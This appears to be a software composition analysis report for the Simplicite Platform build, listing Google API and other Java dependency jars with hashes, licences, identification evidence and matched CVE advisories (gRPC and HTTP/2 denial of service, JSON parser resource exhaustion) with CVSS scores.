MD5: 9d75ff06b99ebf130bb19c8e085714b2
SHA1: edcb90cdd072a9291d9580eb01656c925a73cdad
SHA256: 8f44a4acb88339f7d9d858d504a8f88d268e4fc6094d0e55f8918227b87709bf
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor pom artifactid diffutils Low Vendor pom groupid me.xdrop Highest Vendor pom name diffutils High Product pom artifactid diffutils Highest Product pom groupid me.xdrop Highest Product pom name diffutils High Version pom version 1.3 Highest
fuzzywuzzy-1.2.0.jar (shaded: me.xdrop:fuzzywuzzy-build:1.2.0)
Description: Fuzzy string matching algorithm for Java
License: GPL 3: https://www.gnu.org/licenses/gpl-3.0.en.html
File Path: /var/simplicite/.m2/repository/me/xdrop/fuzzywuzzy/1.2.0/fuzzywuzzy-1.2.0.jar/META-INF/maven/me.xdrop/fuzzywuzzy-build/pom.xml
MD5: 2a5e2854f7988a80a8a330974aa5e902
SHA1: 891dbaecca3f458a52fce228b51c57484f59cfdd
SHA256: e753798e0432312938244be64770e03bef34e80a846b5b562169d03c60073f5f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor pom artifactid fuzzywuzzy-build Low Vendor pom developer id xdrop Medium Vendor pom developer name Panayiotis P Medium Vendor pom groupid me.xdrop Highest Vendor pom name fuzzywuzzy - build High Product pom artifactid fuzzywuzzy-build Highest Product pom developer id xdrop Low Product pom developer name Panayiotis P Low Product pom groupid me.xdrop Highest Product pom name fuzzywuzzy - build High Version pom version 1.2.0 Highest
fuzzywuzzy-1.2.0.jar
Description: Fuzzy string searching implementation of the well-known fuzzywuzzy algorithm in Java
License: GPL 3: https://www.gnu.org/licenses/gpl-3.0.en.html
File Path: /var/simplicite/.m2/repository/me/xdrop/fuzzywuzzy/1.2.0/fuzzywuzzy-1.2.0.jar
MD5: 391d380c3bc51b5be6985f4ddf642863
SHA1: 34d50f9d23e37e713f30d9342e0a7285dc9c7df1
SHA256: 57952aee71092345e41b7c047dd48eb1700c642afdc3fc7d57a583bc57fb43c6
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name fuzzywuzzy High Vendor jar package name fuzzywuzzy Highest Vendor jar package name fuzzywuzzy Low Vendor jar package name me Highest Vendor jar package name me Low Vendor jar package name xdrop Highest Vendor jar package name xdrop Low Vendor pom artifactid fuzzywuzzy Highest Vendor pom artifactid fuzzywuzzy Low Vendor pom developer id xdrop Medium Vendor pom developer name Panayiotis P Medium Vendor pom groupid me.xdrop Highest Vendor pom name fuzzywuzzy High Vendor pom url xdrop/fuzzywuzzy Highest Product file name fuzzywuzzy High Product jar package name fuzzywuzzy Highest Product jar package name fuzzywuzzy Low Product jar package name me Highest Product jar package name xdrop Highest Product jar package name xdrop Low Product pom artifactid fuzzywuzzy Highest Product pom developer id xdrop Low Product pom developer name Panayiotis P Low Product pom groupid me.xdrop Highest Product pom name fuzzywuzzy High Product pom url xdrop/fuzzywuzzy High Version file version 1.2.0 High Version pom version 1.2.0 Highest
gax-1.48.1.jar
Description: Google Api eXtensions for Java
License: BSD: https://github.com/googleapis/gax-java/blob/master/LICENSE
File Path: /var/simplicite/.m2/repository/com/google/api/gax/1.48.1/gax-1.48.1.jar
MD5: a2c0b2ba35a3d01e5ac65f3342c59503
SHA1: 77d7d0173ba203c742198be87aeca88000b6572c
SHA256: 57c73aef9d54a63e483274712f7aa3957bc8f42721695ef9d562a7e13ba1fc51
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name gax High Vendor jar package name api Highest Vendor jar package name gax Highest Vendor jar package name google Highest Vendor Manifest Implementation-Vendor Google High Vendor Manifest specification-vendor Google Low Vendor pom artifactid gax Highest Vendor pom artifactid gax Low Vendor pom developer email googleapis@googlegroups.com Low Vendor pom developer id GoogleAPIs Medium Vendor pom developer name GoogleAPIs Medium Vendor pom developer org Google LLC Medium Vendor pom developer org URL https://www.google.com Medium Vendor pom groupid com.google.api Highest Vendor pom name GAX (Google Api eXtensions) for Java High Vendor pom url googleapis/gax-java Highest Product file name gax High Product jar package name api Highest Product jar package name gax Highest Product jar package name google Highest Product Manifest Implementation-Title gax High Product Manifest specification-title gax Medium Product pom artifactid gax Highest Product pom developer email googleapis@googlegroups.com Low Product pom developer id GoogleAPIs Low Product pom developer name GoogleAPIs Low Product pom developer org Google LLC Low Product pom developer org URL https://www.google.com Low Product pom groupid com.google.api Highest Product pom name GAX (Google Api eXtensions) for Java High Product pom url googleapis/gax-java High Version file version 1.48.1 High Version Manifest Implementation-Version 1.48.1 High Version pom version 1.48.1 Highest
gax-grpc-1.48.1.jar
Description: Google Api eXtensions for Java
License: BSD: https://github.com/googleapis/gax-java/blob/master/LICENSE
File Path: /var/simplicite/.m2/repository/com/google/api/gax-grpc/1.48.1/gax-grpc-1.48.1.jar
MD5: 048f54857c12b4afc27595134fa5092b
SHA1: bd1208b661754c7d00774a7e180c7d32adbf177d
SHA256: b049f4c40807095d48936807ffe876df8c76dd9acbae530f428c2ddbfe1ed891
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name gax-grpc High Vendor jar package name api Highest Vendor jar package name gax Highest Vendor jar package name google Highest Vendor jar package name grpc Highest Vendor Manifest Implementation-Vendor Google High Vendor Manifest specification-vendor Google Low Vendor pom artifactid gax-grpc Highest Vendor pom artifactid gax-grpc Low Vendor pom developer email googleapis@googlegroups.com Low Vendor pom developer id GoogleAPIs Medium Vendor pom developer name GoogleAPIs Medium Vendor pom developer org Google LLC Medium Vendor pom developer org URL https://www.google.com Medium Vendor pom groupid com.google.api Highest Vendor pom name GAX (Google Api eXtensions) for Java High Vendor pom url googleapis/gax-java Highest Product file name gax-grpc High Product jar package name api Highest Product jar package name gax Highest Product jar package name google Highest Product jar package name grpc Highest Product Manifest Implementation-Title gax-grpc High Product Manifest specification-title gax-grpc Medium Product pom artifactid gax-grpc Highest Product pom developer email googleapis@googlegroups.com Low Product pom developer id GoogleAPIs Low Product pom developer name GoogleAPIs Low Product pom developer org Google LLC Low Product pom developer org URL https://www.google.com Low Product pom groupid com.google.api Highest Product pom name GAX (Google Api eXtensions) for Java High Product pom url googleapis/gax-java High Version file version 1.48.1 High Version Manifest Implementation-Version 1.48.1 High Version pom version 1.48.1 Highest
CVE-2023-33953
gRPC contains a vulnerability whereby hpack table accounting errors could lead to unwanted disconnects between clients and servers in exceptional cases. Three vectors were found that allow the following DOS attacks:
- Unbounded memory buffering in the HPACK parser
- Unbounded CPU consumption in the HPACK parser
The unbounded CPU consumption is down to a copy that occurred per-input-block in the parser, and because that could be unbounded due to the memory copy bug we end up with an O(n^2) parsing loop, with n selected by the client.
The unbounded memory buffering bugs:
- The header size limit check was behind the string reading code, so we needed to first buffer up to a 4 gigabyte string before rejecting it as longer than 8 or 16kb.
- HPACK varints have an encoding quirk whereby an infinite number of 0's can be added at the start of an integer. gRPC's hpack parser needed to read all of them before concluding a parse.
- gRPC's metadata overflow check was performed per frame, so that the following sequence of frames could cause infinite buffering: HEADERS: containing a: 1 CONTINUATION: containing a: 2 CONTINUATION: containing a: 3 etc…
CWE-834 Excessive Iteration, CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CVE-2023-44487
The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.
CWE-400 Uncontrolled Resource Consumption ('Resource Exhaustion')
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CVE-2023-4785
Lack of error handling in the TCP server in Google's gRPC starting version 1.23 on posix-compatible platforms (ex. Linux) allows an attacker to cause a denial of service by initiating a significant number of connections with the server. Note that gRPC C++, Python, and Ruby are affected, but gRPC Java and Go are NOT affected.
NVD-CWE-noinfo
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CVE-2023-32732
gRPC contains a vulnerability whereby a client can cause a termination of connection between an HTTP2 proxy and a gRPC server: a base64 encoding error for `-bin` suffixed headers will result in a disconnection by the gRPC server, but is typically allowed by HTTP2 proxies. We recommend upgrading beyond the commit in https://github.com/grpc/grpc/pull/32309
NVD-CWE-Other
CVSSv3: Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
gax-httpjson-0.65.1.jar
Description: Google Api eXtensions for Java
License: BSD: https://github.com/googleapis/gax-java/blob/master/LICENSE
File Path: /var/simplicite/.m2/repository/com/google/api/gax-httpjson/0.65.1/gax-httpjson-0.65.1.jar
MD5: 3c31f1745d5e36df49b38a062407b4af
SHA1: b3b2ce027a50cef2057195876dcb1a577cfe37fa
SHA256: 7b2aa4ccbc0a3691c36ad93c4e6dbc9080830d3c1322e5cccb4af85284dc76e2
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name gax-httpjson High Vendor jar package name api Highest Vendor jar package name gax Highest Vendor jar package name google Highest Vendor jar package name httpjson Highest Vendor Manifest Implementation-Vendor Google High Vendor Manifest specification-vendor Google Low Vendor pom artifactid gax-httpjson Highest Vendor pom artifactid gax-httpjson Low Vendor pom developer email googleapis@googlegroups.com Low Vendor pom developer id GoogleAPIs Medium Vendor pom developer name GoogleAPIs Medium Vendor pom developer org Google LLC Medium Vendor pom developer org URL https://www.google.com Medium Vendor pom groupid com.google.api Highest Vendor pom name GAX (Google Api eXtensions) for Java High Vendor pom url googleapis/gax-java Highest Product file name gax-httpjson High Product jar package name api Highest Product jar package name gax Highest Product jar package name google Highest Product jar package name httpjson Highest Product Manifest Implementation-Title gax-httpjson High Product Manifest specification-title gax-httpjson Medium Product pom artifactid gax-httpjson Highest Product pom developer email googleapis@googlegroups.com Low Product pom developer id GoogleAPIs Low Product pom developer name GoogleAPIs Low Product pom developer org Google LLC Low Product pom developer org URL https://www.google.com Low Product pom groupid com.google.api Highest Product pom name GAX (Google Api eXtensions) for Java High Product pom url googleapis/gax-java High Version file version 0.65.1 High Version Manifest Implementation-Version 0.65.1 High Version pom version 0.65.1 Highest
CVE-2022-45688
A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data.
CWE-787 Out-of-bounds Write
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CVE-2023-5072
Denial of Service in JSON-Java versions up to and including 20230618. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
geoapi-3.0.1.jar
Description: The development community in building GIS solutions is sustaining an enormous level of effort. The GeoAPI project aims to reduce duplication and increase interoperability by providing neutral, interface-only APIs derived from OGC/ISO Standards.
License: https://raw.githubusercontent.com/opengeospatial/geoapi/master/LICENSE.txt
File Path: /var/simplicite/.m2/repository/org/opengis/geoapi/3.0.1/geoapi-3.0.1.jar
MD5: fa9a86892774b94b2bde0446ebbebd62
SHA1: a69b261841b0794b82b8d42fcd6e9a370eb62809
SHA256: ca1dfeba112d0dea575c7abba76a8ecd6ea7818e508de964302a9cfc4779b837
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name geoapi High Vendor jar package name opengis Highest Vendor Manifest bundle-docurl http://www.geoapi.org Low Vendor Manifest bundle-symbolicname org.opengis.geoapi Medium Vendor Manifest implementation-url http://www.geoapi.org Low Vendor Manifest Implementation-Vendor The GeoAPI project High Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor Manifest specification-vendor Open Geospatial Consortium Low Vendor pom artifactid geoapi Highest Vendor pom artifactid geoapi Low Vendor pom developer email martin.desruisseaux@geomatys.fr Low Vendor pom developer id desruisseaux Medium Vendor pom developer name Martin Desruisseaux Medium Vendor pom developer org Geomatys Medium Vendor pom developer org URL http://www.geomatys.com Medium Vendor pom groupid org.opengis Highest Vendor pom name GeoAPI High Vendor pom parent-artifactid geoapi-parent Low Product file name geoapi High Product jar package name opengis Highest Product Manifest bundle-docurl http://www.geoapi.org Low Product Manifest Bundle-Name GeoAPI Medium Product Manifest bundle-symbolicname org.opengis.geoapi Medium Product Manifest implementation-url http://www.geoapi.org Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product Manifest specification-title GeoAPI Medium Product pom artifactid geoapi Highest Product pom developer email martin.desruisseaux@geomatys.fr Low Product pom developer id desruisseaux Low Product pom developer name Martin Desruisseaux Low Product pom developer org Geomatys Low Product pom developer org URL http://www.geomatys.com Low Product pom groupid org.opengis Highest Product pom name GeoAPI High Product pom parent-artifactid geoapi-parent Medium Version file version 3.0.1 High Version Manifest Bundle-Version 3.0.1 High Version Manifest specification-version 3.0.1 High Version pom version 3.0.1 Highest
google-api-client-1.30.3.jar
Description: The Google API Client Library for Java provides functionality common to all Google APIs; for example HTTP transport, error handling, authentication, JSON parsing, media download/upload, and batching.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/api-client/google-api-client/1.30.3/google-api-client-1.30.3.jar
MD5: 20c6528b490e6ff39013a71f5a2bd855
SHA1: 5eb3dab97d9cc6de9065f5d21e4513597336c04a
SHA256: da89326bd0eb9b8a355e5b87090bf201cb1eed4e734fc60cdb8cbab31904dd8c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-api-client High Vendor jar package name api Highest Vendor jar package name client Highest Vendor jar package name google Highest Vendor jar package name googleapis Highest Vendor Manifest automatic-module-name google.api.client Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor Manifest bundle-docurl https://developers.google.com/api-client-library/java/ Low Vendor Manifest bundle-symbolicname com.google.api.client.googleapis Medium Vendor Manifest Implementation-Vendor Google High Vendor Manifest Implementation-Vendor-Id com.google.api-client Medium Vendor Manifest originally-created-by Apache Maven Bundle Plugin Low Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor pom artifactid google-api-client Highest Vendor pom artifactid google-api-client Low Vendor pom groupid com.google.api-client Highest Vendor pom name Google APIs Client Library for Java High Vendor pom parent-artifactid google-api-client-parent Low Product file name google-api-client High Product jar package name api Highest Product jar package name client Highest Product jar package name google Highest Product jar package name googleapis Highest Product Manifest automatic-module-name google.api.client Medium Product Manifest build-jdk-spec 1.8 Low Product Manifest bundle-docurl https://developers.google.com/api-client-library/java/ Low Product Manifest Bundle-Name Google APIs Client Library for Java Medium Product Manifest bundle-symbolicname com.google.api.client.googleapis Medium Product Manifest Implementation-Title Google APIs Client Library for Java High Product Manifest originally-created-by Apache Maven Bundle Plugin Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product pom artifactid google-api-client Highest Product pom groupid com.google.api-client Highest Product pom name Google APIs Client Library for Java High Product pom parent-artifactid google-api-client-parent Medium Version file version 1.30.3 High Version Manifest Bundle-Version 1.30.3 High Version Manifest Implementation-Version 1.30.3 High Version pom version 1.30.3 Highest
google-api-client-gson-1.30.3.jar
Description: GSON extensions to the Google APIs Client Library for Java
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/api-client/google-api-client-gson/1.30.3/google-api-client-gson-1.30.3.jar
MD5: e8caae672593d93434fc2d2b0eb3b032
SHA1: cb5dbf9d006dabfb2c75693b3650a6f16c939556
SHA256: e9a5f6d4ae65bc8e93633904830eae39291b4f6f338377caad3534a6274536da
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-api-client-gson High Vendor jar package name api Highest Vendor jar package name client Highest Vendor jar package name google Highest Vendor jar package name googleapis Highest Vendor Manifest automatic-module-name google.api.client.gson Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor Manifest bundle-docurl https://googleapis.dev/java/google-api-client/1.30.3/index.html Low Vendor Manifest bundle-symbolicname com.google.api.client.googleapis.notifications.json.gson Medium Vendor Manifest Implementation-Vendor Google High Vendor Manifest Implementation-Vendor-Id com.google.api-client Medium Vendor Manifest originally-created-by Apache Maven Bundle Plugin Low Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Vendor pom artifactid google-api-client-gson Highest Vendor pom artifactid google-api-client-gson Low Vendor pom groupid com.google.api-client Highest Vendor pom name GSON extensions to the Google APIs Client Library for Java High Vendor pom parent-artifactid google-api-client-parent Low Product file name google-api-client-gson High Product jar package name api Highest Product jar package name client Highest Product jar package name google Highest Product jar package name googleapis Highest Product Manifest automatic-module-name google.api.client.gson Medium Product Manifest build-jdk-spec 1.8 Low Product Manifest bundle-docurl https://googleapis.dev/java/google-api-client/1.30.3/index.html Low Product Manifest Bundle-Name GSON extensions to the Google APIs Client Library for Java Medium Product Manifest bundle-symbolicname com.google.api.client.googleapis.notifications.json.gson Medium Product Manifest Implementation-Title GSON extensions to the Google APIs Client Library for Java High Product Manifest originally-created-by Apache Maven Bundle Plugin Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" Low Product pom artifactid google-api-client-gson Highest Product pom groupid com.google.api-client Highest Product pom name GSON extensions to the Google APIs Client Library for Java High Product pom parent-artifactid google-api-client-parent Medium Version file version 1.30.3 High Version Manifest Bundle-Version 1.30.3 High Version Manifest Implementation-Version 1.30.3 High Version pom version 1.30.3 Highest
CVE-2022-45688
A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data.
CWE-787 Out-of-bounds Write
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
CVE-2023-5072
Denial of Service in JSON-Java versions up to and including 20230618. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
google-api-services-calendar-v3-rev20190910-1.30.1.jar
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/apis/google-api-services-calendar/v3-rev20190910-1.30.1/google-api-services-calendar-v3-rev20190910-1.30.1.jar
MD5: 4cd619cd192be6dbf2c2c5a1413235ca
SHA1: a4c3ee04b4423ffabd7eb6da5d5b81b6e7bda6e3
SHA256: ca48258f6091be3fee8b2714ab1a93c413a36668e1213dae6d2669971c6342e8
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-api-services-calendar-v3-rev20190910 High Vendor jar package name api Highest Vendor jar package name calendar Highest Vendor jar package name google Highest Vendor jar package name services Highest Vendor Manifest automatic-module-name com.google.api.services.calendar Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-api-services-calendar Highest Vendor pom artifactid google-api-services-calendar Low Vendor pom groupid com.google.apis Highest Vendor pom name Calendar API v3-rev20190910-1.30.1 High Vendor pom organization name Google High Vendor pom organization url http://www.google.com/ Medium Product file name google-api-services-calendar-v3-rev20190910 High Product jar package name api Highest Product jar package name calendar Highest Product jar package name google Highest Product jar package name services Highest Product Manifest automatic-module-name com.google.api.services.calendar Medium Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-api-services-calendar Highest Product pom groupid com.google.apis Highest Product pom name Calendar API v3-rev20190910-1.30.1 High Product pom organization name Google Low Product pom organization url http://www.google.com/ Low Version pom version v3-rev20190910-1.30.1 Highest
google-api-services-drive-v3-rev20190822-1.30.1.jar
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/apis/google-api-services-drive/v3-rev20190822-1.30.1/google-api-services-drive-v3-rev20190822-1.30.1.jar
MD5: 07819940f73a6147ab9952560ec66bbe
SHA1: a8511329b9f3b5be123913e8345d99ee700282bf
SHA256: 835babe90799f91cfb735b037d14cfa3305c2fffc6d7f753fc6df7fb74f83bea
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-api-services-drive-v3-rev20190822 High Vendor jar package name api Highest Vendor jar package name drive Highest Vendor jar package name google Highest Vendor jar package name services Highest Vendor Manifest automatic-module-name com.google.api.services.drive Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-api-services-drive Highest Vendor pom artifactid google-api-services-drive Low Vendor pom groupid com.google.apis Highest Vendor pom name Drive API v3-rev20190822-1.30.1 High Vendor pom organization name Google High Vendor pom organization url http://www.google.com/ Medium Product file name google-api-services-drive-v3-rev20190822 High Product jar package name api Highest Product jar package name drive Highest Product jar package name google Highest Product jar package name services Highest Product Manifest automatic-module-name com.google.api.services.drive Medium Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-api-services-drive Highest Product pom groupid com.google.apis Highest Product pom name Drive API v3-rev20190822-1.30.1 High Product pom organization name Google Low Product pom organization url http://www.google.com/ Low Version pom version v3-rev20190822-1.30.1 Highest
google-api-services-gmail-v1-rev20190602-1.30.1.jar
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/apis/google-api-services-gmail/v1-rev20190602-1.30.1/google-api-services-gmail-v1-rev20190602-1.30.1.jar
MD5: c1e0bfbf80ce1273f1c95ec91e7fe8c7
SHA1: cdb3ede72771778923f960146a2f2dad3f29e7f0
SHA256: 3e50e9aa4a50d882912bd317993c0cbe9c4ef6fbc4e585d7ca2ddc2bc6aad0ab
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-api-services-gmail-v1-rev20190602 High Vendor jar package name api Highest Vendor jar package name gmail Highest Vendor jar package name google Highest Vendor jar package name services Highest Vendor Manifest automatic-module-name com.google.api.services.gmail Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-api-services-gmail Highest Vendor pom artifactid google-api-services-gmail Low Vendor pom groupid com.google.apis Highest Vendor pom name Gmail API v1-rev20190602-1.30.1 High Vendor pom organization name Google High Vendor pom organization url http://www.google.com/ Medium Product file name google-api-services-gmail-v1-rev20190602 High Product jar package name api Highest Product jar package name gmail Highest Product jar package name google Highest Product jar package name services Highest Product Manifest automatic-module-name com.google.api.services.gmail Medium Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-api-services-gmail Highest Product pom groupid com.google.apis Highest Product pom name Gmail API v1-rev20190602-1.30.1 High Product pom organization name Google Low Product pom organization url http://www.google.com/ Low Version pom version v1-rev20190602-1.30.1 Highest
google-api-services-plus-v1-rev20190328-1.30.1.jar
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/apis/google-api-services-plus/v1-rev20190328-1.30.1/google-api-services-plus-v1-rev20190328-1.30.1.jar
MD5: d190b6cd10aee91d96975ee633ad4101
SHA1: 5d37538b7be26f10dff011cfb30bbf3ab9d8f19f
SHA256: 6609b0440916f3c66197ed795f7642ae481a81bfb9b1f81da29928cf85a49891
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-api-services-plus-v1-rev20190328 High Vendor jar package name api Highest Vendor jar package name google Highest Vendor jar package name plus Highest Vendor jar package name services Highest Vendor Manifest automatic-module-name com.google.api.services.plus Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-api-services-plus Highest Vendor pom artifactid google-api-services-plus Low Vendor pom groupid com.google.apis Highest Vendor pom name Google+ API v1-rev20190328-1.30.1 High Vendor pom organization name Google High Vendor pom organization url http://www.google.com/ Medium Product file name google-api-services-plus-v1-rev20190328 High Product jar package name api Highest Product jar package name google Highest Product jar package name plus Highest Product jar package name services Highest Product Manifest automatic-module-name com.google.api.services.plus Medium Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-api-services-plus Highest Product pom groupid com.google.apis Highest Product pom name Google+ API v1-rev20190328-1.30.1 High Product pom organization name Google Low Product pom organization url http://www.google.com/ Low Version pom version v1-rev20190328-1.30.1 Highest
google-api-services-sheets-v4-rev20190813-1.30.1.jar
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/apis/google-api-services-sheets/v4-rev20190813-1.30.1/google-api-services-sheets-v4-rev20190813-1.30.1.jar
MD5: bda6f69acea39cf97f8ae87078c8ba50
SHA1: 0b753378dba91d8753a9948da270cb9c3d49501e
SHA256: 8ebfd01900640228890d6db056b311e7e437490d127becd8ab9ca3bc64ec9db6
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-api-services-sheets-v4-rev20190813 High Vendor jar package name api Highest Vendor jar package name google Highest Vendor jar package name services Highest Vendor jar package name sheets Highest Vendor Manifest automatic-module-name com.google.api.services.sheets Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-api-services-sheets Highest Vendor pom artifactid google-api-services-sheets Low Vendor pom groupid com.google.apis Highest Vendor pom name Google Sheets API v4-rev20190813-1.30.1 High Vendor pom organization name Google High Vendor pom organization url http://www.google.com/ Medium Product file name google-api-services-sheets-v4-rev20190813 High Product jar package name api Highest Product jar package name google Highest Product jar package name services Highest Product jar package name sheets Highest Product Manifest automatic-module-name com.google.api.services.sheets Medium Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-api-services-sheets Highest Product pom groupid com.google.apis Highest Product pom name Google Sheets API v4-rev20190813-1.30.1 High Product pom organization name Google Low Product pom organization url http://www.google.com/ Low Version pom version v4-rev20190813-1.30.1 Highest
google-api-services-storage-v1-rev20190624-1.30.1.jar
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/apis/google-api-services-storage/v1-rev20190624-1.30.1/google-api-services-storage-v1-rev20190624-1.30.1.jar
MD5: 64fc59d905430afb5ab42b670ff9fdd2
SHA1: 965c7c4f92f4a4058b6759505c6f520fb0033832
SHA256: 3d3b56deab3b97ef75ea1360b3170aa5a3872566274938618a6dc0e86343bbe1
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name google-api-services-storage-v1-rev20190624 High Vendor jar package name api Highest Vendor jar package name google Highest Vendor jar package name services Highest Vendor jar package name storage Highest Vendor Manifest automatic-module-name com.google.api.services.storage Medium Vendor Manifest build-jdk-spec 1.8 Low Vendor pom artifactid google-api-services-storage Highest Vendor pom artifactid google-api-services-storage Low Vendor pom groupid com.google.apis Highest Vendor pom name Cloud Storage JSON API v1-rev20190624-1.30.1 High Vendor pom organization name Google High Vendor pom organization url http://www.google.com/ Medium Product file name google-api-services-storage-v1-rev20190624 High Product jar package name api Highest Product jar package name google Highest Product jar package name services Highest Product jar package name storage Highest Product Manifest automatic-module-name com.google.api.services.storage Medium Product Manifest build-jdk-spec 1.8 Low Product pom artifactid google-api-services-storage Highest Product pom groupid com.google.apis Highest Product pom name Cloud Storage JSON API v1-rev20190624-1.30.1 High Product pom organization name Google Low Product pom organization url http://www.google.com/ Low Version pom version v1-rev20190624-1.30.1 Highest
google-api-services-translate-v2-rev20170525-1.30.1.jar
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/google/apis/google-api-services-translate/v2-rev20170525-1.30.1/google-api-services-translate-v2-rev20170525-1.30.1.jar
MD5: 49b810431970d3585119ebae4d372955
SHA1: d190fa670e88901a2e5247ea394f7ae2cc394c15
SHA256: ae3b32be4e5a9450a36f8fed26ea5f26bc624ec15fb4a0f1160c6c8cf0e35559
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | google-api-services-translate-v2-rev20170525 | High
Vendor | jar | package name | api | Highest
Vendor | jar | package name | google | Highest
Vendor | jar | package name | services | Highest
Vendor | jar | package name | translate | Highest
Vendor | Manifest | automatic-module-name | com.google.api.services.translate | Medium
Vendor | Manifest | build-jdk-spec | 1.8 | Low
Vendor | pom | artifactid | google-api-services-translate | Highest
Vendor | pom | artifactid | google-api-services-translate | Low
Vendor | pom | groupid | com.google.apis | Highest
Vendor | pom | name | Google Cloud Translation API v2-rev20170525-1.30.1 | High
Vendor | pom | organization name | Google | High
Vendor | pom | organization url | http://www.google.com/ | Medium
Product | file | name | google-api-services-translate-v2-rev20170525 | High
Product | jar | package name | api | Highest
Product | jar | package name | google | Highest
Product | jar | package name | services | Highest
Product | jar | package name | translate | Highest
Product | Manifest | automatic-module-name | com.google.api.services.translate | Medium
Product | Manifest | build-jdk-spec | 1.8 | Low
Product | pom | artifactid | google-api-services-translate | Highest
Product | pom | groupid | com.google.apis | Highest
Product | pom | name | Google Cloud Translation API v2-rev20170525-1.30.1 | High
Product | pom | organization name | Google | Low
Product | pom | organization url | http://www.google.com/ | Low
Version | pom | version | v2-rev20170525-1.30.1 | Highest
google-api-services-youtube-v3-rev20190827-1.30.1.jar
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
